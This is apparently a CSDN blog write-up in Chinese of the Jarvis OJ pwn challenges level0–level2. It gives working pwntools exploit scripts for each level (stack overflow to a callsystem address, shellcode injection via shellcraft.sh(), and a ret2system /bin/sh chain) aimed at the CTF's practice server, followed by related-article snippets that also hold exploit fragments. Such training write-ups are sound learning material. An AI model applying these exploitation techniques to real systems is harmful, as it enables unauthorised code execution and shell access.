Jarvis oj level系列小记

最新推荐文章于 2024-03-28 11:29:55 发布
最新推荐文章于 2024-03-28 11:29:55 发布
阅读量182 收藏
点赞数 2
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H_sfan/article/details/97490588
版权

level0
首先我们先checksec一下level0文件,

在这里插入图片描述
可以尝试栈溢出
可以看到level0是64位文件,所以将level0拖入ida_x64,这类题简单,直接给出了system和/bin/sh

在这里插入图片描述在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述

同时,read可以读入0x200个字符,所以可以实现覆盖callsystem的地址
代码如下

from pwn import *
p = remote("pwn2.jarvisoj.com",9881) 
d = 'a'*0x80
f = 'a'*8
sys_addr = 0x0000000000400596
payload = d+ f + p64(sys_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
level1
首先checksec level1

在这里插入图片描述
发现文件是32位的,还发现了nx保护是关闭的,将文件拖入ida32

在这里插入图片描述
发现并没有system,我们点vulnerable_function函数
在这里插入图片描述

发现了一个printf函数,综合来看可以执行shellcode
代码如下

from pwn import *
shellcode = asm(shellcraft.sh())
p = remote('pwn2.jarvisoj.com', 9877)
text = p.recvline()[14: -2]
buf_addr = int(text, 16)
payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
p.send(payload)
p.interactive()

脚本执行

在这里插入图片描述
level2
第一步先checksec level2

在这里插入图片描述
level2是32位,就拖入32位ida

在这里插入图片描述
发现有system,进入字符串发现有bin/sh

在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述
综上条件
脚本如下

from pwn import * 
p = remote('pwn2.jarvisoj.com','9878')
elf = ELF('./level2')
sh_addr = elf.search('/bin/sh').next()
system_addr = elf.symbols['system']
exit_addr = elf.symbols['read']
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(exit_addr) + p32(sh_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
暂时先写到这,细节以后有时间补,小白所做,大佬绕过,新手食用。

大桥石虎
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1200
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
Jarvis OJ level1
Kni9hT's Blog
11-08 577
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
JarvisOJ level4
PLpa的博客
07-08 2253
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 347
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
Jarvis OJ level1
九层台
07-06 762
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
jarvisojpwnlevel系列wp
Huiuyao的博客
12-09 2800
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
jarvisoj_level1
m0sway的博客
12-03 2239
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
buuctf之jarvisoj_level0
weixin_54452942的博客
03-28 1015
64位(system_addr+1)的奥秘
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
Jarvis声音.zip
09-28
这个压缩包可能包含了一系列模仿Jarvis声音的音频文件,用于个性化用户的电脑或QQ消息提示音。 首先,让我们来了解一下什么是ZIP文件。ZIP是一种常见的文件格式,用于数据压缩和归档,它可以将多个文件或文件夹打包...
基于Springboot和Vue的数码论坛系统设计与实现-源码 数码论坛系统设计与实现代码(高分毕设)
最新发布
07-24
数码论坛系统设计与实现-源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
java程序设计—JAVA局域网飞鸽传书软件设计与实现(源代码+论文)43.rar
07-24
java程序设计,可供正在学习的同学研究参考。
年终总结汇报PPT模板(20)三套材料.pptx
07-24
年终总结汇报PPT模板(20)三套材料.pptx
ListView侧边A-Z快速定位导航.zip
07-24
ListView侧边A-Z快速定位导航
java程序设计—JAVA文件传输(论文+源代码)59.rar
07-24
java程序设计,可供正在学习的同学研究参考。
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值